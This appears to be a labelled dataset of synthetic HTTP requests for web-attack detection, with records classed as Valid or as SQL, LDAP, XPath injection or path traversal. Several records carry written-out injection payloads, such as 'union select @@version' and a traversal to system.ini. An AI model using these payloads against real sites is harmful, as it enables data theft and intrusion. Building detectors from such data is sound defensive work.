Accept-Encoding: identity;q=0.4, deflate
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 177.129.186.148
Cookie: Smt=pARFdln;IN0dE3YKtmpvbscriptin.=54;nbuoiiso= b;YaLaSisai=843489584
Cookie2: $Version="3"
Date: Sun, 23 Mar 08 03:17:46 CET
ETag: "vNIe2YSEI3ewdqaY80I"
Expect: yoj8A2=gahra;aiixs=pnlsh
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Fri, 11 Jan 08 11:32:27 UTC
If-Unmodified-Since: Fri, 24 Feb 06 17:20:48 CET
If-Match: *
If-None-Match: "dIlZ5l701fB8pjD"
If-Range: Sun, 01 Feb 09 03:05:45 GMT
Max-Forwards: 2
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=ADd2Cfd8
Authorization: Uwdre aehanso=tetaMp
Range: -766,58-986789
Referer: /ayteer.avi
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/0.1 (Windows; U; WinNT 2.5; h0-de; rv:1.2.1) Gecko/26957213
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8393x485
Via: 6.3 www.fmnrM.jpeg, 0.0 www.0mSPlmfl.tiff
Transfer-Encoding: deflate
Upgrade: tul6nr/8.0, k5roha/7.1, edhia/4.1, tben/5.7
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8655
Start - Id: 16162
class: Valid
GET /syaAn5bIcioana/yuu_8KZej@No7Eqt/eDt/5tkNoSZ/oRMUZ0jq9./mnym3fylpn8cmo/DoQDASqkf9script.cgi?i8rseh=87ahhl&ER56qkXJL=bFaWCfZ&lCEv9UDmI=3XghoMa&ee=9 HTTP/1.0
Host: 241.130.217.64
Connection: nylelj
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.2, identity;q=0.4, deflate;q=0.1, identity;q=0.3
Accept-Language: t5eA-dgEeo5, gZse-sE0ie;q=0.3
Cache-Control: max-stale
Client-ip: 163.65.92.102
Cookie: BBQr4B4teRb=24898
Cookie2: $Version="737"
Date: Sun, 14 Oct 07 22:00:18 UTC
ETag: "RPeD2251fsD7P4nBAkey"
Expect: 100-continue
From: nt6y@jrn3wp.st
If-Modified-Since: Sat, 26 Aug 06 24:16:00 UTC
If-Unmodified-Since: Tue, 16 Mar 04 08:52:57 GMT
If-Match: "lloHo.M9gUOxnukUACA"
If-None-Match: *
If-Range: "f58y7ul1uVdgUuMO"
Max-Forwards: 407
MIME-Version: 7.0
Pragma: hYn='euAgg'
Proxy-Authorization: Basic bWFsZ2VvbTpzR2huZG8=
Authorization: eTnft 6oio6=cetm
Range: -0401,-5888,85828-61
Referer: /etstdi4r/1uiEret/goie.tar
TE: gzip;q=0.9,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/0.3 (compatible; MSIE 7.1; Open BSD i586; I4fcbl00; UaeeLtndfa)
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 4.9 197.175.228.238
Transfer-Encoding: gzip
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 823993
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16162
Start - Id: 36850
class: LdapInjection
GET /sgsX43/rt/tnhte5acsM/LHgl/s53bubOLRoGA@/rfPw89@1YhM/shutdownV1zlYn_P/mneme07l5hrVaelghatw/kPZM_Mpn4dy71JBoB/Ml1mlYYlV.jpeg?iuois5o4xthfyey=ms&WTmm=nd%26ya&drenl1uyt42uOxo=aeevbhigmst3nr&i4hqvne=0lgoou7r&zDf4GHH=sro610gGY8&Tneitetmo=EbaHsmn&num2r=9t%3Bni&it9ei=dlbhdocumentfeTsuftpt&cmonyO4b=tYoQGnXZ&snrrdtSeeniceet=oi&rt5jiearw=sent2lbnor2e&z1ftedT9Rwanai1=3432&oeeehevarxrFv=9979&ItunOb1hNu=2ubt HTTP/1.0
Host: www.prfu1o.cz:16365
Connection: snilhya
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: no-cache
If-Unmodified-Since: Mon, 02 Feb 09 03:33:00 GMT
Authorization: apnan eo7o=whpat
Range: -0235,09-
Referer: /nars/ttcs/tEhtatc.js
User-Agent: 0d17iutaqoeetds
Transfer-Encoding: identity

null

End - Id: 36850
Start - Id: 45497
class: PathTransversal
GET /er7HIARWYY_qjOY/9lpoaho/htt6Tn66eDqobtwhdTe/sCTyHm0Hjl/fNsN/VUmetaKQZI6d.mspx?erU3vK=ctuf%40&db=ohiwelibeacwz6l&_Grba_G2lDun=72036363&ob0Yatit=0609&ETd=4uduniony&og=ntfa5ihun59p%5ChTautoexecm&sd9ssaisr444e=tQSiU&vv6locationJi.0aVJ=%5CWINNT%5Csystem.ini&1RUdIhK_BinU=6003 HTTP/1.1
Host: www.lsc6nim.uk:314
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: n-xPIvqae
Cache-Control: jaaeatss='nhm'
Client-ip: 165.251.254.128
Cookie: ts3em8isieacyrh=cn1twM;pk=htotT1e2+Di0xmludixh;d0usstoetOr=F/P><loehtftnaa5o%
Cookie2: $Version="629"
Date: Wed, 02 Feb 05 04:09:38 GMT
ETag: "SQQiLGzppLASCU-m"
Expect: shtTeapd=s0or6;ewio3=nsoo
From: rddIbt@n7reian.st
If-Modified-Since: Wed, 18 May 05 16:55:13 GMT
If-Unmodified-Since: Sun, 01 May 05 03:29:42 CET
If-Match: *
If-None-Match: *
If-Range: "WJuNZph3I_LEhQN8"
Max-Forwards: 37
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic b2Rlcmw6cEVobFN1aHM=
Authorization: ftsb tthhtw=otis
Range: 20-48,0-277881
Referer: /rtpaoed/nwh6oo/ch27n.asp
TE: trailers,gzip;q=0.7,deflate;q=0.8
Trailer: Accept-Language
User-Agent: Mozilla/8.5 (X11; U; Solaris 0.5; 3E-Ro; rv:8.3.0) Gecko/62866525
UA-CPU: MIPS
UA-Disp: 3246,785,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: 8.0 9.172.27.77, HTTP/8.6 www.hhlqse.png, 9ti/3.8 54.63.61.109
Transfer-Encoding: deflate
Upgrade: dBhiia/6.0
Warning: 882 118.217.63.222 "etpoiZeexEopAili8v" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45497
Start - Id: 30560
class: Valid
GET /lR1f8v.bDXt@o/t@aHPYvx7kG/tK/hoEtbyeehqtti7x/Rosen3e9lfb0apmepnc/ahDqaDBvl1kmGNDPgH/pX_F3US5vHqUB1JGV7N/rFZlPGywll5JE/OwinntR/Ifel.cfm?rsezselecttX383exec=m%26o%2F%40&n2a=%3DsstooLeki&ieasn=Leetrmrna0i&DPvgqYjE=44873&hznehthS=lfodE&glhouqng=hdD9o-m4WRP&a2cRD=41hkd1&6itmo=0470986662 HTTP/1.0
Host: www.rsaantb.ch
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: koi8-r;q=0.2, us-ascii
Accept-Encoding: compress;q=0.9, compress;q=0.9, identity, deflate;q=0.6, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 232.70.91.49
Cookie: sGlocationGlL0zEpositionQa=32834
Cookie2: $Version="86"
Date: Sat, 04 Jun 05 17:28:03 UTC
ETag: "dLlX-MllNg-_2WhKCrAj"
Expect: 100-continue
From: fulner@n7m8d5nmt.de
If-Modified-Since: Sat, 04 Sep 04 23:28:28 UTC
If-Unmodified-Since: Mon, 06 Nov 06 19:35:23 UTC
If-Match: "SPntM15wiXTI@ZGC"
If-None-Match: "R@pF4nC9lYKnGzVidH"
If-Range: "XIYNeGzH4Lt7TKZzfV"
Max-Forwards: 0881
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: OpooIe pc0eupm=ilsme7
Authorization: Digest username="horge"
Range: 592356-588
Referer: /8Ihl/nwaePLh/rsnnnhl.css
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: edsai/7.8.0.0
UA-CPU: 68000
UA-Disp: 1748,808,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5611x433
Via: HTTP/8.6 64.242.5.167:994, 4.8 79.158.81.50, 0.5 143.50.212.102
Transfer-Encoding: gzip
Upgrade: rbeSP/8.9
Warning: 101 www.tIeR.gif "pntre1cl" "Wed, 21 Oct 09 09:03:24 CET"
X-Forwarded-For: 197.167.252.1
X-Serial-Number: 13347760723298878984
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30560
Start - Id: 24666
class: Valid
GET /a9mhscd3an2oesdeee/rWphpt0a-CNQSbodyXLh/xtarnooxttseep/eLTjdQ-KNa6Xs8/iopKeTngSINf8vYnXH/a1L@D.aspx? HTTP/1.0
Host: 43.164.253.127
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: eT-SSOW;q=0.6
Cache-Control: no-transform
Client-ip: 148.233.252.203
Cookie: in4knr=-dO ;uiw=wenauelameieuy9;rdmrct=5;IUIEZ=aZssae&9cathtaccesed;cC.N6P9ae.X=]o8c1o
Cookie2: $Version="662"
Date: Fri, 06 Apr 07 07:51:20 CET
ETag: "E23@zmqtynS5u3jM_G-W"
Expect: 100-continue
From: dtiJev@chlmiutOj.fr
If-Modified-Since: Thu, 01 Jan 09 08:17:21 CET
If-Unmodified-Since: Sat, 04 Sep 04 24:19:49 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Jan 04 02:56:37 CET
Max-Forwards: 558
MIME-Version: 1.8
Pragma: Ht='mht'
Proxy-Authorization: ey32r aystd9=ymtsuleh
Authorization: d16s iQoosen=tAnt
Range: 7216-
Referer: /etdoY2/IO8eits/Eo1yday/yhnodr/erTuL1h.wmn
TE: gzip;q=0.7,trailers,trailers
Trailer: Expect
User-Agent: ryea/3.5.8.5.4
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 089x5784
Via: 1.1 www.zclothN.gif
Transfer-Encoding: compress
Upgrade: 5nc/3.4, vr6e/9.2, opl/0.0, drdnea/1.4, oieily/2.2
Warning: 680 www.slre.css:8068 "tgceuha" 
X-Forwarded-For: 186.140.0.183
X-Serial-Number: 791354389748242566
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24666
Start - Id: 14887
class: Valid
GET /nU/oskasAaryhako9nocuet.nsf?mocha.PznLi=1h7&slesnttTadicsll=sFYZd&W9wF0aetcIXlNni=mtywo4tellzo&motaerd=htdpsjg&aGNtf=ibSAiGo3%40&eTd=25&inheoaeHek=26559651&tesLent=eet%28dJs HTTP/1.0
Host: www.eeaactn.org
Connection: quewetzk
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 93.117.64.27
Cookie: t_iXV6=q;BCPJwBFz7HLbody=43844;itQnarerd=edenIb 8Eaeir;ohI=0122813;h8iu=]isjei\rt<7ne:;ht7tilL=46792
Cookie2: $Version="49"
Date: Tue, 27 Jan 04 20:52:23 GMT
ETag: W/"Pbb2bshDLSpjSXa"
Expect: 100-continue
From: lowanht@ceRsaits.it
If-Modified-Since: Thu, 29 Sep 05 02:56:56 UTC
If-Unmodified-Since: Sun, 11 Jul 04 22:01:41 GMT
If-Match: *
If-None-Match: *
If-Range: "jyb4NOArge9AEyWf"
Max-Forwards: 32
MIME-Version: 7.5
Pragma: naeemm='nj'
Proxy-Authorization: NTLM aXhpZXN1ZWdxZXR1OW5lZXJhYWFraVp1dXBzYWhlZG53bGRyb2Zm
Authorization: edlcpy nm1myt=ahKhmmhr
Range: 614-,0-6202
Referer: http://inajwdo.uk/2ereXye/isteta/tuits.dll
TE: trailers
Trailer: Cache-Control
User-Agent: mnudlA8
UA-CPU: 68000
UA-Disp: 5587,0901,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5504x4372
Via: 4.9 www.e4re.js
Transfer-Encoding: gzip
Upgrade: jsrn/5.3, 8icwp/6.5
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 123.153.218.172
X-Serial-Number: 572302445496
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 14887
Start - Id: 42318
class: SqlInjection
GET /Aew3farenst/okBUP/kJo/t0qY7L368GjzShvwmf/rr/grPVJ.Zb3Q/wtq2gZWl/tsidceptddxdawy/fettejnht3DhnssnlEd.html?yFTvp.mreplace=%27++++%29++++UNION+ALL+SELECT++95+FROM+sd2sdny+WHERE+++%28+++%27%27+++%3D+%27 HTTP/1.0
Host: www.Dcmtso.st:1
Connection: close
Accept: */*;q=0.0
Accept-Charset: x-mac-hebrew;q=0.0, x-mac-ce;q=0.5, x-mac-chinesesimp;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 64.206.153.107
Cookie: wrs=ca|
Cookie2: $Version="97"
Date: Mon, 12 Sep 05 19:57:38 GMT
ETag: "TofU@QbCUF13A_Qc"
Expect: sEeh=gef1
From: vtsibh@nsti.biz
If-Modified-Since: Sun, 24 Dec 06 23:35:32 UTC
If-Unmodified-Since: Mon, 02 Mar 09 19:26:13 GMT
If-Match: *
If-None-Match: "e@zv3K06u8F2oQzEZ"
If-Range: "34tX5k06-tS.PcRqB"
Max-Forwards: 0146
MIME-Version: 7.7
Pragma: h='u'
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Digest cnonce="sli9ah"
Range: -36
Referer: http://www.uceoaS.ch/tSTiue/aglehcal/ct4skiut/Lsse/9d86.png
TE: trailers,deflate;q=0.8,trailers
Trailer: If-Match
User-Agent: atDqoumrenga0at
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4371x6437
Via: 8.4 www.6sxpebn.js
Transfer-Encoding: gzip
Upgrade: roeoon/1.6, etEa/9.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42318
Start - Id: 22132
class: Valid
GET /nsi5tarK0F/pgD/rsotpea96pcadsTn/ehcbeTe7ahi0b/xo0d88object_kTqMGZ3g/utfdollwcneea6he/Y@/2eiosrtsi/f0rGCLO1D6v_sh3/oSzJRz..gif?litaiea=65398&uogie58=7fXMq-CdET&lFcp94FBWxen=hdJKFcX&9ea=doeseepbthczman&lndaI=meoarkachee&wiae=135746684&ktpudtor5d=2Eseso+h+&iT=ceeltEtargwe&TuFoCY.g4y=g+56i%5B&mNvr8nspar8stpn=qTeD&eo7yevtttewe=63&5d=tDolocationE&0t04Ur8resc6sa=2etdtEnedLNnthhr HTTP/1.0
Host: 249.44.34.86:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: co1-Ma, bnwi-Neomenye, g0hha-ie0, jOdkilTe-prwae, ett3tte1-a
Cache-Control: max-stale=0310
Client-ip: 64.207.74.70
Cookie: w2cpni=ttosSa|scriptex-edd0 1 wm;N68toeohpgosl=rht~;araha=e@S3azkkFr;ran0rorpn=Chnei;jetu9Rzugrhj6Un=8;vhS=Sdsuean
Cookie2: $Version="10"
Date: Tue, 23 Nov 04 13:49:37 CET
ETag: W/"ks5gb@SECqcr6yCST0"
Expect: et9a
From: ers7@stiihe.com
If-Modified-Since: Wed, 20 Jul 05 16:52:18 UTC
If-Unmodified-Since: Thu, 14 Dec 06 08:44:16 CET
If-Match: "l6AOyMpnLe7wdrTMmUv"
If-None-Match: "0GT9GqGCp0xq_sGjVF"
If-Range: "mvq25h_nkqOl3kWx1taI"
Max-Forwards: 9
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWhpb2l0Z3JlV3FvYXIzd2NtZGFzVUwyaU5kMmVyb3RkdzZodWg5Ymk=
Authorization: Digest realm
Range: 1976-
Referer: http://www.lent.ch/oetti/eibt/eeesEif.jpeg
TE: gzip;q=0.0,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: rZWmXaU http://www.toto8ot.de
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 221x4182
Via: HTTP/7.5 www.ehRrs.png
Transfer-Encoding: identity
Upgrade: ereinf/3.5, eEt0/2.9, zrTT/7.8, hta/4.0
Warning: 962 www.banl.css "pnseoesh" "Fri, 16 Jan 09 06:00:56 GMT"
X-Forwarded-For: 150.191.145.37
X-Serial-Number: 0543999319817911662
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22132
Start - Id: 48347
class: XPathInjection
GET /sR0UseTbdOmRhq-flE/leiMvGx7593wEU6SV/d8PEB6ZtGNLqDX/tyTn/zhiaubeye3lq3sht/xHIgq3GvG/aAIEn9L95XQWOJneLwv/af08re/lngnlwipst/ronionTnyS3frs/pvdupTPGRFpn1W3R/in0.ZXY2zy.jpeg?i8nmw9=9241391638&un3ene1eg=nU9tuGK8DSan&4ki8smltjnatsta=aeG7bLA_&tsaexhWtoihRl=5326661&yy=ci%25Eo%2F5&ulepe=hro&cdumnDehTar2=cDc7%7E3neei6lk&er=hVL6V55z&2aoeoeb=altpn&esan6ghs=%26r+calib&ecrik6=8ct&atTmI=s HTTP/1.0
Host: 162.110.215.75
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-ce, iso-8859-15;q=0.8
Accept-Encoding: mtsHorc'    or  count(    path/child::node()[position(   )=((   i   +    j   +   k  +   l  +1)]    | path/child::*()[position()=(k+1)])=1 or    'O3p0aiaj'=    '     lr2ir' or
Accept-Language: 9-t;q=0.9, N-dtEreE;q=0.5, 4oom9i3-9orU;q=0.1
Cache-Control: no-store
Client-ip: 201.243.131.154
Cookie: ss54pd=ebb0Ad4dOk;ooihSda=Er\mscriptulinsert- a;fuhetwaoun0=79;glRnioayn7frsoi=1410740;p3T4=845885
Cookie2: $Version="056"
Date: Wed, 05 Sep 07 10:39:29 UTC
ETag: W/"q6XRizdtNw3X9KQu19"
Expect: sCbae=NsEera;lsae0ast
From: o65E@sltnqAcMg.uk
If-Modified-Since: Wed, 29 Nov 06 24:28:35 GMT
If-Unmodified-Since: Fri, 09 Jan 09 03:28:06 CET
If-Match: *
If-None-Match: "uVTL8-cClZk9RJR"
If-Range: "hPt.QYl8w3FPf.fjjx"
Max-Forwards: 13
MIME-Version: 4.9
Pragma: ee=stliL3
Proxy-Authorization: Digest qop=auth-int
Authorization: loEu aemrnolr=raoessc
Range: -579124,02412-
Referer: http://www.ssHmte71.fr/dre6hfxa/etltnCn/7s1rino.rar
TE: chunked;q=0.1,trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.9 (compatible; Bb5fp5; Unix; shlse1iiiI; evf1tze)
UA-Pixels: 784x5970
Via: 9.8 www.zsd0.gif, 5.2 74.9.42.10, 3.4 www.jTret.html
Transfer-Encoding: gzip
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 0.11.203.195
X-Serial-Number: 215734
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48347
Start - Id: 27927
class: Valid
GET /gv9ldrcEoni/Iste3lbeTaee0qwgs/ey40agenrndape1u/egae.html?aee0sHhlhcmr=5tdd3smJtj&Iiinat46nh=76&waed=dOy5ND&anrnec9snmeu=35587&ewr5waOto=252647 HTTP/1.0
Host: 115.58.107.152
Connection: keep-alive
Accept: image/*, audio/basic, audio/*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 228.43.186.124
Cookie: chloEhe=epJpTpH1rrD;d3in6eesecprxor=1;prsfhzcoBA0ea0a=5127;tds=460275
Cookie2: $Version="67"
Date: Thu, 29 Jun 06 02:23:22 CET
ETag: "DJ_yv33bMBi2mkN5vTiQ"
Expect: 100-continue
From: ethjhtno@OeeoEam.be
If-Modified-Since: Sat, 07 Apr 07 12:35:12 UTC
If-Unmodified-Since: Sun, 05 Jul 09 10:47:53 CET
If-Match: *
If-None-Match: "H57c2nQtuwup@WJtwy"
If-Range: Mon, 01 May 06 03:44:23 UTC
Max-Forwards: 508
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest username="8zR2"
Authorization: NTLM R2VsbmFldWh0ZXluc203bnlpaXJjdnNubHR0dEhobVNz
Range: -14621,-370256
Referer: /wOrkswe/qrncEth.exe
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.9 (compatible; Konqueror/7.6; Open BSD i586; samh)
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4388x7796
Via: 4.7 234.143.98.38, 7.1 188.115.241.92
Transfer-Encoding: deflate
Upgrade: rne/3.6, coinw/3.3, ouw3/6.5, cro/1.1
Warning: 133 www.lJae.css "ewiowestteogamnuhux" "Sat, 06 Oct 07 10:45:03 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27927
Start - Id: 41606
class: SqlInjection
GET /dapcnat2i6r.shtml?Osr77re=aEGapdV-&d7esY=%27++union+select++%40%40version%2C1%2C1%2C1--&htiu=0v+hssnoh%5B HTTP/1.0
Host: www.s1Es.net
Connection: close
Accept: image/*;q=0.3, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: thzodT-z;q=0.8, rx-raduvLw
Cache-Control: min-fresh=72927
Client-ip: 66.83.180.190
Cookie: Owhdm=99648358
Cookie2: $Version="7"
Date: Fri, 31 Aug 07 20:19:01 UTC
ETag: W/"javWwvhnc36ZMUY-15lG"
Expect: 100-continue
From: tcssd@oays6you.com
If-Modified-Since: Mon, 29 Jun 09 04:44:06 GMT
If-Unmodified-Since: Fri, 27 May 05 21:05:27 UTC
If-Match: "GLj31RWXyy@wOqMjY"
If-None-Match: "X@-Yezx1no71IPp"
If-Range: "U_yPt@IBIvFgpvR"
Max-Forwards: 6
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: ryxi gNxeosa=uhmefjAm
Range: -827608,0-149272
Referer: http://tkgOl0Rw.st/ieg0/laxs9e8y/utae/utWnra.wmn
TE: trailers,trailers,deflate;q=0.7
Trailer: Referer
User-Agent: gdkQ5pO@h http://www.SpLaeo.be
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4149x276
Via: 6.0 www.ro3ha6g.png
Transfer-Encoding: eirRsr; Aetn=dlapJ63e
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 846 125.8.137.130 "rhch5ohdnsoyi" "Mon, 08 Dec 08 08:13:31 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41606
Start - Id: 14094
class: Valid
GET /nP0N0Wlfx6/iuDnB/nt0eHoncGttttx7Sees/hNdmBV0dgx.Et/2sFM88jEhS8Rsu/ofd8iEVEBYkLW1/aa2HY@KxG7M_mTjv7/eBerm/ianoar9yocddd0t.msf?tgrtsifaaheybm=06&mtr=15&eed0MNin8hcsro=46433&lhOmeeeldswonmt=innfl&citctuUen8=209131&EOn=rrrepro6uS3yE8p&grmioIc=4916&j1l.wDUo.=mr&sgeaepma=08998&luneenu=09 HTTP/1.0
Host: www.orut.be:80
Connection: t4de
Accept: application/*;q=0.8, audio/*, text/*
Accept-Charset: shift_jis;q=0.1, iso-8859-2, iso-8859-8-i, iso-8859-5, x-mac-arabic
Accept-Encoding: 
Accept-Language: ci-srvhne0, 7ngt-0ecyeA, 0uka-s2
Cache-Control: no-transform
Client-ip: 250.248.98.251
Cookie: ni0=Bfcyu group by0s<YoMD;eelfef=11933
Cookie2: $Version="3"
Date: Tue, 03 Apr 07 03:22:53 GMT
ETag: W/"OFX8qW6@tVkBPnDzL"
Expect: 100-continue
From: apCylsgf@aiOdeitn.it
If-Modified-Since: Sun, 13 Dec 09 16:34:42 UTC
If-Unmodified-Since: Sat, 06 Dec 08 24:04:16 CET
If-Match: "U-qM4Az_N8G2BVVF5"
If-None-Match: "usIDgmAjVqZCh.RyN"
If-Range: Thu, 26 Aug 04 07:17:14 UTC
Max-Forwards: 8
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: NTLM aGR0ZWdvYXV0ZXNpNE1wZWVjbW5kaGVqVHVUYUxlbzA=
Authorization: NTLM dW43ZTNOOXRlZXhzaWZpZXhzbGF1dDl0b0ZBb0dodG45ZnlhYWNlbWxpaUM1
Range: 784942-,615-
Referer: http://www.8msli.it/annaterf/rshly/asu6o/uheh/gtag.jpg
TE: gzip,gzip
Trailer: Host
User-Agent: Mozilla/7.5 (X11; U; Open BSD i386 3.2; bh-eb; rv:3.9.6) Gecko/06568076
UA-CPU: 68000
UA-Disp: 091,777,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5013x5767
Via: 7.6 92.153.139.209
Transfer-Encoding: compress
Upgrade: AwRag/8.7, eiPt/1.4
Warning: 212 92.42.159.177:5 "tacideteon" 
X-Forwarded-For: 123.87.48.214
X-Serial-Number: 45329823
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14094
Start - Id: 21974
class: Valid
GET /kxpRhoepL/Z_A.7av5mIPT/tEa/djp81EURsPfH/ezhdkS.dll?kl=oE&lt=4835&qsvisrixhraj=8927&eePeu2e8meev=haewa HTTP/1.0
Host: www.6ayh6elt.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nl2euno-go;q=0.7, E1Hyj-htadya, 2zdU31o-ne;q=0.9, ort-o
Cache-Control: no-cache
Client-ip: 3.169.52.148
Cookie: pao=ea;etut=ge7ddropm4
Cookie2: $Version="56"
Date: Tue, 02 Jun 09 02:51:31 GMT
ETag: W/"CJD9J0aF-_.onLAiHCgW"
Expect: neoot=oinv6tgt
From: hso9@seTndeScl.it
If-Modified-Since: Sun, 16 Apr 06 07:13:42 GMT
If-Unmodified-Since: Fri, 13 Nov 09 15:20:06 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5222
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: NTLM ZjRzYTFldGhlaWV0bXZ0ZXVIYXV0dm5UYm55ZW5paTg=
Range: 2-874,8-,3113-623962
Referer: http://www.i0fiDA.cz/teuocntm/5ohp/oheG/ej6slT.doc
TE: trailers
Trailer: Expect
User-Agent: ozeeade (huzf8G; todlK35; h.pbV@)
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 044x0436
Via: 5.8 221.203.140.203, HTTP/5.8 145.56.52.55, 5.1 78.114.233.170:2
Transfer-Encoding: compress
Upgrade: fysst/0.3
Warning: 225 83.153.240.145 "z2mns9" "Wed, 03 Nov 04 24:19:07 UTC"
X-Forwarded-For: 181.0.228.135
X-Serial-Number: 09176432061314
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21974
Start - Id: 13339
class: Valid
GET /ladV2b5N4JtF2./bmattbtcnoeTodw7naN/te/KbOwp-2P_nlocationc50/fEXx4Gdq8iU.RbvwiD/uhNMkdrhDUwqG0kMF2/uaboot.iniHgPCPSHz.6/sPCfhA/wWcdtL-fssJ3sy/ihehBscnlttheelse/rreoenr.dll?ts4bn2es8fEh=iexecot2a&nIctZJNmailrf=Znuoj8&FTscript2.K.6=iduezdoppn&aa=d4t5creStaie&yretye=tGQesu&yrpur=c0j&apt=chaegyt&ojfTnndsr=t_quFdiR&oeeetwrSnfkxst=h5%7Cperl&0nneamdet4rt=4022&geqs=8&ydJeSavtRa=szJ4&eeLmoMhezbsugea=ielagceme&Nesokot=re6se2eon7eu0eys HTTP/1.0
Host: www.ircl.fr
Connection: esnaapOe
Accept: application/postscript;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 42.70.218.26
